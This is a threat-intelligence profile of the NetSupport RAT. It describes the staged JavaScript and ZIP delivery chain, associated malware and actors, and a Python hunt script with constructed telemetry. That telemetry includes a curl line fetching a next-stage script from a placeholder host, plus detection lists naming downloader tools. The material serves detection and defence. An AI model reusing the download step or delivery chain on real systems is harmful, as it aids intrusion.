Netsupport

Malware updated 14 days ago (2024-10-03T23:01:53.830Z)
NetSupport Manager is a legitimate remote-control product whose client has been abused as a remote access trojan (commonly tracked as NetSupport RAT) by a range of threat actors. It is often deployed alongside other malware such as Black Basta ransomware, IcedID and, occasionally, Lumma Stealer, the most common infostealer in the world today. Infection typically starts with a suspicious download, email attachment or website, usually without the user noticing. Once the client is installed, the operators have full remote access and can steal personal information, disrupt operations or stage a ransomware deployment that holds data hostage. NetSupport was used during a Royal ransomware attack and has been employed by former ITG23 members and affiliates (ITG23 is IBM X-Force's designation for the Trickbot/Conti group) in their intrusions.

The infection process is multi-staged. It begins with a JavaScript file downloaded from a malicious website; that file retrieves and runs further JavaScript payloads over several stages. Finally, a ZIP archive containing every file needed to run the NetSupport client is downloaded, extracted and executed on the victim's machine. Once running, the client beacons out to an attacker-controlled command-and-control (C2) gateway, signalling that the host is ready for unauthorized access.

Attacks like this can be detected and monitored with tools such as Rapid7's InsightIDR Attacker Behavior Analytics, which flag suspicious process launches and file modifications indicative of attacker activity. In one observed case the attacker used the 7-Zip compression utility and the NetSupport Manager remote-control tool. Because the client is a legitimately signed commercial binary, reputation- or hash-based blocking alone is unreliable; detection should key on the delivery chain (script host, downloader, archive extraction), on the client running from a user-writable directory rather than its normal install path, and on NetSupport gateway traffic from hosts that are not sanctioned to run it. NetSupport itself is a legitimate remote-support software vendor; the "RAT" label refers to the abused, repackaged client, not to the product. The phishing emails analysed in these incidents are often basic yet still get past email security controls.
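The detection approach described above, as an added example that is not code from this page, from Rapid7 or from NetSupport Ltd: a small hunt script that runs four rules over constructed process-creation and web-proxy telemetry, one per stage of the chain (script host spawning a downloader, 7-Zip extracting into a user-writable directory, the client launched from a user-writable path, and the outbound beacon), then correlates them per host. The artefact names it checks (client32.exe as the NetSupport Manager client executable, the "NetSupport Manager/1.3" User-Agent) come from public analyses of the abused client rather than from this page, and the sanctioned-host set stands in for a real asset inventory.

```python
"""
Hunt rules for the staged NetSupport RAT delivery chain: script-host download,
archive extraction, client launch from a user-writable directory, and the
outbound beacon.  Added example; all telemetry below is constructed.  The
artefact names checked (client32.exe, the "NetSupport Manager/1.3" User-Agent)
are the ones public analyses of the abused client report, and the sanctioned
host list is an assumption standing in for an asset inventory.
"""
from __future__ import annotations

import re
from collections import defaultdict

# --- constructed sample telemetry ------------------------------------------
# Process-creation events in the shape of Sysmon Event ID 1, reduced to the
# fields the rules need.  WS-017 shows the full chain; HD-002 runs the licensed
# client from its normal install path; WS-020 is ordinary 7-Zip use.
PROCESS_EVENTS = [
    {"host": "WS-017", "parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r"curl.exe -s -o C:\Users\alice\AppData\Local\Temp\s2.js http://stage.example.invalid/s2.js"},
    {"host": "WS-017", "parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Users\alice\AppData\Local\Temp\7z.exe",
     "cmdline": r"7z.exe x C:\Users\alice\AppData\Local\Temp\pkg.zip -oC:\Users\alice\AppData\Roaming\nsm"},
    {"host": "WS-017", "parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Users\alice\AppData\Roaming\nsm\client32.exe",
     "cmdline": r"C:\Users\alice\AppData\Roaming\nsm\client32.exe"},
    {"host": "HD-002", "parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe",
     "cmdline": r"C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe"},
    {"host": "WS-020", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\7-Zip\7zG.exe",
     "cmdline": r"7zG.exe x C:\Users\bob\Downloads\report.zip -oC:\Users\bob\Downloads\report"},
]

# Web-proxy lines (constructed): client_ip host method path user_agent
PROXY_LOG = """\
10.1.4.17 ws-017 GET /s2.js Mozilla/5.0
10.1.4.17 ws-017 POST /fakeurl.htm NetSupport Manager/1.3
10.1.9.2 hd-002 POST /fakeurl.htm NetSupport Manager/1.3
"""

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
DOWNLOADERS = {"curl.exe", "powershell.exe", "bitsadmin.exe", "certutil.exe"}
ARCHIVERS = {"7z.exe", "7za.exe", "7zg.exe"}
# Locations an unprivileged user can write to; a licensed install lives under
# Program Files, so the client running from one of these is the signal.
USER_WRITABLE = re.compile(
    r"\\(users\\[^\\]+\\appdata|programdata|users\\public|windows\\temp)\\", re.I)
# Assumption: hosts where the licensed NetSupport Manager client is expected.
SANCTIONED_NSM_HOSTS = {"hd-002"}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def process_findings(events: list[dict]) -> list[tuple[str, str]]:
    """Return (host, rule) pairs for each chain stage seen in process telemetry."""
    findings = []
    for e in events:
        host = e["host"].lower()
        parent, image, cmd = basename(e["parent"]), basename(e["image"]), e["cmdline"]
        # Stage 1: a script host (the initial .js) spawning something that can fetch the next stage.
        if parent in SCRIPT_HOSTS and image in DOWNLOADERS:
            findings.append((host, "stage1_script_host_downloader"))
        # Stage 2: 7-Zip extracting ("x"/"e") an archive inside a user-writable directory.
        if image in ARCHIVERS and re.search(r"\s[xe]\s", cmd) and USER_WRITABLE.search(cmd):
            findings.append((host, "stage2_archive_extracted_in_user_dir"))
        # Stage 3: the NetSupport client launched from a user-writable path.
        if image == "client32.exe" and USER_WRITABLE.search(e["image"]):
            findings.append((host, "stage3_client32_from_user_dir"))
    return findings


def proxy_findings(log: str) -> list[tuple[str, str]]:
    """Flag NetSupport gateway beacons from hosts not sanctioned to run the client."""
    findings = []
    for line in log.splitlines():
        _ip, host, _method, _path, ua = line.split(" ", 4)
        if ua.startswith("NetSupport Manager/") and host not in SANCTIONED_NSM_HOSTS:
            findings.append((host, "beacon_netsupport_ua_unsanctioned_host"))
    return findings


def chained_hosts(findings, min_stages: int = 2) -> dict[str, list[str]]:
    """Group findings per host; several distinct stages on one host is the strong signal."""
    stages = defaultdict(set)
    for host, rule in findings:
        stages[host].add(rule)
    return {h: sorted(r) for h, r in stages.items() if len(r) >= min_stages}


def hunt(events=PROCESS_EVENTS, log=PROXY_LOG) -> dict[str, list[str]]:
    return chained_hosts(process_findings(events) + proxy_findings(log))


if __name__ == "__main__":
    for host, rules in hunt().items():
        print(host, "->", ", ".join(rules))
```

Each rule on its own is noisy (helpdesk staff legitimately run 7-Zip and the NetSupport client), which is why the script only reports hosts that trip at least two stages; the sanctioned-host check is what separates a licensed deployment from the same binary dropped by the loader chain.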
Description last updated: 2024-10-03T22:15:34.838Z
Possible Aliases / Cluster overlaps
It's hard to track cluster overlaps and naming conventions between vendors, so here are some possible overlapping names / profiles you also may want to look at.
Alias / Description / Votes

Netsupport Rat (5 votes) is a possible alias for Netsupport. NetSupport RAT is malicious software (malware) that poses a significant threat to organizational safety. The malware, which can be spread through suspicious downloads, emails, or websites, infiltrates systems without detection and has the potential to steal personal information, disrupt operations

Netsupport Manager (4 votes) is a possible alias for Netsupport. NetSupport Manager is the legitimate remote-control product whose client is repackaged and abused as NetSupport RAT. The abused client is often delivered disguised as legitimate software or tools, such as the 7-Zip compression utility or a fake Chrome browser update, to trick users into downloading and installing it. Once
Miscellaneous Associations
Other elements of context that could aid in the identification of relevance
Malware
Rat
Ransomware
Windows
Vulnerability
Exploit
Infostealer
Wordpress
Tool
Trojan
Phishing
Payload
Associated Malware
Alias / Description / Association type / Votes

QakBot (association type: Unspecified; 3 votes) is associated with Netsupport. Qakbot is a potent piece of malware, or malicious software, that infiltrates computer systems through suspicious downloads, emails, or websites. Once installed, it can steal personal information, disrupt operations, or even hold data hostage for ransom. This malware, built by various groups includin

DarkGate (association type: Unspecified; 3 votes) is associated with Netsupport. DarkGate is a multifunctional malware known for its capabilities in information and credential stealing, cryptocurrency theft, and ransomware delivery. A recent campaign has seen it exploit a zero-day vulnerability in Microsoft Windows, allowing it to infiltrate systems undetected. DarkGate can be d

Lumma Stealer (association type: Unspecified; 2 votes) is associated with Netsupport. Lumma Stealer is a highly sophisticated malware variant known for its extensive data-harvesting capabilities. It is designed to steal sensitive information such as passwords, card details, cryptocurrency wallets, and browser session cookies from infected devices. Lumma Stealer employs a DLL side-loa

IcedID (association type: Unspecified; 2 votes) is associated with Netsupport. IcedID is malware designed to exploit and damage computer systems. It has been identified in association with various other malware families such as Qakbot, BazarLoader, CobaltStrike, Conti, Gozi, Trickbot, Quantum, Emotet, and Pikabot. The IcedID IntBot Loader (int-bot.dll) is

Vidar (association type: Unspecified; 2 votes) is associated with Netsupport. Vidar is malicious software (malware) that operates as an infostealer, primarily targeting Windows-based systems. It's written in C++ and is based on the Arkei stealer. Vidar is part of a broader landscape of malware threats such as Emotet, IcedID, CobaltStrike, SVCReady, CargoBay, Pushdo, Minodo,

SocGholish (association type: Unspecified; 2 votes) is associated with Netsupport. SocGholish is malicious software (malware) that has been significantly prevalent in cyber threats over recent years. In 2022, it was observed being used in conjunction with the Parrot TDS to deliver the FakeUpdates downloader to unsuspecting visitors on compromised websites. By late 2022, Microsof
Associated Threat Actors
Alias / Description / Association type / Votes

BattleRoyal (association type: Unspecified; 3 votes) is associated with Netsupport. BattleRoyal, a threat actor group, has been observed using a variety of attack channels to deliver the DarkGate remote access trojan (RAT). These include phishing emails, fake browser updates, traffic distribution systems (TDSs), malicious VBScript, steganography, and notably, a Windows SmartScreen

FIN7 (association type: Unspecified; 2 votes) is associated with Netsupport. FIN7, also known as Carbanak, Carbon Spider, Cobalt Group, and Navigator Group, is a notorious cybercrime group that has been active since 2012. The group is recognized for its advanced combination of malware and social engineering tactics, having executed numerous successful attacks against global
Source Document References
Information about the Netsupport Malware was read from the documents corpus below. This display is limited to 20 results.
Source / Created at

BankInfoSecurity (14 days ago)
DARKReading (21 days ago)
CERT-EU (7 months ago)
DARKReading (4 months ago)
SANS ISC (4 months ago)
DARKReading (7 months ago)
CERT-EU (7 months ago)
CERT-EU (10 months ago)
CERT-EU (8 months ago)
CERT-EU (9 months ago)
Trend Micro (2 years ago)
SecurityIntelligence.com (a year ago)
CERT-EU (a year ago)
CERT-EU (a year ago)
CERT-EU (a year ago)
InfoSecurity-magazine (a year ago)
CERT-EU (a year ago)
CERT-EU (a year ago)
CERT-EU (9 months ago)
CERT-EU (10 months ago)